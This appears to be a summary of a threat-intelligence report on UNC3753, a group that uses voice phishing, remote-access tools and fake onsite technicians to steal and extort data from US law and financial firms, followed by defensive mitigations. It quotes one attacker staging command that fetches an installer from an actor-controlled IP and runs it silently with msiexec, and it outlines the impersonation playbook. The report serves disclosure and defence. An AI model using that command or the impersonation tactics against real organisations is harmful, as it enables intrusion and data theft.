"This is not a joke or a scam." — line from a sample extortion email Mandiant observed, attributed to the group tracked as UNC3753.
UNC3753: vishing, rapid intrusions, and extortion
From January through May 2026, Mandiant identified a financially motivated data theft extortion campaign carried out by the threat cluster UNC3753 targeting dozens of organizations across professional, legal, and financial services in the United States. The group uses voice phishing (vishing) and social engineering to gain remote access, often completing the full attack sequence — initial contact through data theft and extortion — within a single business day. In some cases Mandiant observed searches, staging, and theft initiated in under an hour.
Tools abused: RMM, screen-sharing, Privnote and cURL staging
UNC3753 relies on human deception to bypass technical controls. Actors call employees — sometimes using contact details publicly listed on corporate websites — and pose as internal IT or security staff to persuade targets to join screen-sharing sessions or install remote monitoring and management (RMM) utilities. The campaign makes repeated use of legitimate commercial utilities including Zoom, Microsoft Teams, Microsoft Terminal Services, Quick Assist, and RMM software such as AnyDesk, Bomgar, Zoho Assist, and SuperOps RMM.
To avoid leaving persistent artifacts, the actors transmit installation links and commands using privnote[.]com, a self‑destructing text service. Mandiant recorded a staging example where a cURL command pulled an installer and executed an MSI via msiexec: curl -sL "http://[actor-controlled-ip]/installer" -o "SuperOps.msi" && msiexec /i "SuperOps.msi" /quiet
Data staging and exfiltration: OneDrive, iManage, WinSCP and Rclone
Once inside, the actors map directories, enumerate OneDrive folders and mapped drives, and use keyword searches inside document systems such as iManage to locate tax forms (W‑2, W‑9, 1099), audit files, client agreements, and Social Security numbers. Staged results are often placed in Downloads folders or Roaming profile paths.
Exfiltration is equally opportunistic: portable WinSCP or Rclone binaries are used where allowed; actors also upload files directly through the victim’s browser into actor-controlled consumer cloud storage accounts, sometimes creating folders renamed to mimic the victim organization. In one case Mandiant observed 1.7 GB exfiltrated from a local OneDrive to Google Drive, and an additional 14.4 GB taken using WinSCP. Google has disabled Drive accounts and assets tied to this activity.
Physical access escalation: onsite technician ruse and the FBI Cyber FLASH
Although UNC3753 primarily deploys remote social engineering, GTIG notes an escalation to physical tactics. The FBI’s Cyber FLASH Alert corroborates instances where actors, failing to secure remote footholds, sent individuals to victims’ offices who posed as technicians and attempted to image devices or copy data to USB drives. GTIG assesses these physical intrusions are likely associated with UNC3753 based on overlaps in structure, timeline, and targets, though some incidents lacked forensic evidence or subsequent extortion to enable formal attribution.
Mitigations recommended by GTIG and Mandiant
Mandiant and GTIG offer concrete controls to blunt this campaign’s human-focused approach. Key recommendations include:
- User education tailored to UNC3753 tactics and vishing scenarios.
- Physical access verification: require photo IDs, log visitor IDs, pre-scheduled work orders, and mandatory escorts for technical personnel.
- Conditional access: restrict VDI and VPN authentication to corporate-owned devices and require MFA step‑up for BYOD VDI access.
- Application control and RMM restrictions: block unauthorized installers and enforce Windows Defender Application Control or equivalent policies.
- Disable write/read capabilities for external USB mass storage via GPOs or MDM, and restrict removable and optical media on BYOD systems accessing VDI.
- Network monitoring: alert on outbound connections to unauthorized file‑sharing APIs, monitor SSH (port 22) for high‑volume WinSCP/Rclone transfers, and enable firewall session logging with byte counts.
- Audit and alerting in document stores (iManage, SharePoint) for bulk searches and mass downloads; enforce MFA on critical repositories.
What this means for technologists, policymakers, and law firms
- Technologists and security teams: prioritize detection for behavior patterns named in Mandiant’s findings (privnote usage, cURL‑launched MSI installers, high‑volume Rclone/WinSCP transfers, mass iManage searches) and enforce application control and conditional access for VDIs and BYOD.
- Policymakers and regulators: the extortion letters explicitly reference potential "substantial regulatory fines" and reputational harm, underscoring why regulatory compliance and incident notification procedures will be focal points for affected organizations.
- Affected law firms and professional services firms: assume attackers may be able to reach clients and partners quickly — UNC3753 threatens to call and email external clients within days — and harden both technical repositories and front‑office physical procedures (visitor verification, escorted access) accordingly.
UNC3753’s playbook is straightforward but effective: weaponize trust, abuse legitimate remote tools, and move fast. The addition of in‑person attempts to copy data turns administrative lapses into high‑value failure modes. Organizations that combine strict physical verification, application whitelisting, conditional VDI controls, and focused detection for the specific artifacts Mandiant describes will be better positioned to blunt an adversary that prizes speed and social engineering over sophisticated malware.
Source: https://cloud.google.com/blog/topics/threat-intelligence/targeted-campaign-us-law-firms/
